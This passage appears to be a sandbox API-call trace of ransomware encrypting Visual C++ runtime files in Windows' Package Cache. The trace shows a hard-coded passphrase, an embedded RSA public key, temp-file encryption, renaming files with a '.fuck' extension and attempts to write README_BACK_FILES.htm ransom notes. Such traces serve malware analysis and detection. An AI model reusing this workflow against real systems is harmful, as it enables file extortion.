FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.130] FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.130] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27eaa10 [0238.130] FindNextFileA (in: hFindFile=0x27eaa10, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.130] FindNextFileA (in: hFindFile=0x27eaa10, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.130] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.130] GetLastError () returned 0x5 [0238.130] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0238.131] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.131] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.132] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.132] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.132] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a8b0) returned 1 [0238.134] CryptCreateHash (in: hProv=0x285a8b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.134] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.134] CryptHashData (hHash=0x27eaa90, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.134] CryptDeriveKey (in: hProv=0x285a8b0, Algid=0x6610, hBaseData=0x27eaa90, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27eac10) returned 1 [0238.134] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.134] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.134] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285a3e8) returned 1 [0238.134] CryptImportPublicKeyInfo (in: hCryptProv=0x285a3e8, dwCertEncodingType=0x1, pInfo=0x2869458*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869488*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869490*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27ea950) returned 1 [0238.134] CryptEncrypt (in: hKey=0x27ea950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.134] CryptEncrypt (in: hKey=0x27ea950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a938*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a938*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.135] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a938, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.135] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279a780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279a780, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.135] CryptEncrypt (in: hKey=0x27eac10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279a780*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279a780*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.135] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279a780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.135] CloseHandle (hObject=0xffffffff) returned 1 [0238.135] CloseHandle (hObject=0xffffffff) returned 1 [0238.135] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0238.135] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.135] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg")) returned 0 [0238.136] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.fuck")) returned 0 [0238.136] CryptDestroyHash (hHash=0x27eaa90) returned 1 [0238.136] CryptDestroyKey (hKey=0x27eac10) returned 1 [0238.136] CryptReleaseContext (hProv=0x285a8b0, dwFlags=0x0) returned 1 [0238.136] FindNextFileA (in: hFindFile=0x27eaa10, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.136] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.136] GetLastError () returned 0x5 [0238.137] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0238.137] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0238.138] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.138] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.138] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.138] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a828) returned 1 [0238.140] CryptCreateHash (in: hProv=0x285a828, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.140] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.140] CryptHashData (hHash=0x27eadd0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.140] CryptDeriveKey (in: hProv=0x285a828, Algid=0x6610, hBaseData=0x27eadd0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ea810) returned 1 [0238.140] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.140] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.140] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285a8b0) returned 1 [0238.141] CryptImportPublicKeyInfo (in: hCryptProv=0x285a8b0, dwCertEncodingType=0x1, pInfo=0x28695f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869628*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869630*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27ea9d0) returned 1 [0238.141] CryptEncrypt (in: hKey=0x27ea9d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.141] CryptEncrypt (in: hKey=0x27ea9d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a0b8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a0b8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.141] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a0b8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.141] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279a780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279a780, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.141] CryptEncrypt (in: hKey=0x27ea810, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279a780*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279a780*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.141] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279a780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.141] CloseHandle (hObject=0xffffffff) returned 1 [0238.141] CloseHandle (hObject=0xffffffff) returned 1 [0238.141] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), bFailIfExists=0) returned 0 [0238.142] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x0) returned 0 [0238.142] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg")) returned 0 [0238.142] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.fuck" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.fuck")) returned 0 [0238.142] CryptDestroyHash (hHash=0x27eadd0) returned 1 [0238.142] CryptDestroyKey (hKey=0x27ea810) returned 1 [0238.143] CryptReleaseContext (hProv=0x285a828, dwFlags=0x0) returned 1 [0238.143] FindNextFileA (in: hFindFile=0x27eaa10, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.143] FindClose (in: hFindFile=0x27eaa10 | out: hFindFile=0x27eaa10) returned 1 [0238.143] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\readme_back_files.htm")) returned 0xffffffff [0238.143] AreFileApisANSI () returned 1 [0238.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286d350, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0238.143] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.143] GetLastError () returned 0x5 [0238.143] GetLastError () returned 0x5 [0238.143] FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.143] FindClose (in: hFindFile=0x27ea8d0 | out: hFindFile=0x27ea8d0) returned 1 [0238.144] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.144] AreFileApisANSI () returned 1 [0238.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.144] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.144] GetLastError () returned 0x5 [0238.144] GetLastError () returned 0x5 [0238.144] FindNextFileA (in: hFindFile=0x27eaa50, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.144] FindClose (in: hFindFile=0x27eaa50 | out: hFindFile=0x27eaa50) returned 1 [0238.144] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\readme_back_files.htm")) returned 0xffffffff [0238.144] AreFileApisANSI () returned 1 [0238.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.145] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.145] GetLastError () returned 0x5 [0238.145] GetLastError () returned 0x5 [0238.145] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.145] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eaf10 [0238.146] FindNextFileA (in: hFindFile=0x27eaf10, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.146] FindNextFileA (in: hFindFile=0x27eaf10, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.146] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27eae90 [0238.146] FindNextFileA (in: hFindFile=0x27eae90, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.146] FindNextFileA (in: hFindFile=0x27eae90, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.146] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27ea990 [0238.146] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.146] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.146] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.146] GetLastError () returned 0x5 [0238.146] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0238.147] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.147] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.147] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.148] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.148] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a9c0) returned 1 [0238.150] CryptCreateHash (in: hProv=0x285a9c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.150] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.150] CryptHashData (hHash=0x27ea810, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.150] CryptDeriveKey (in: hProv=0x285a9c0, Algid=0x6610, hBaseData=0x27ea810, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27eaa10) returned 1 [0238.150] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.150] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.150] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285aa48) returned 1 [0238.150] CryptImportPublicKeyInfo (in: hCryptProv=0x285aa48, dwCertEncodingType=0x1, pInfo=0x2868d08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2868d38*, 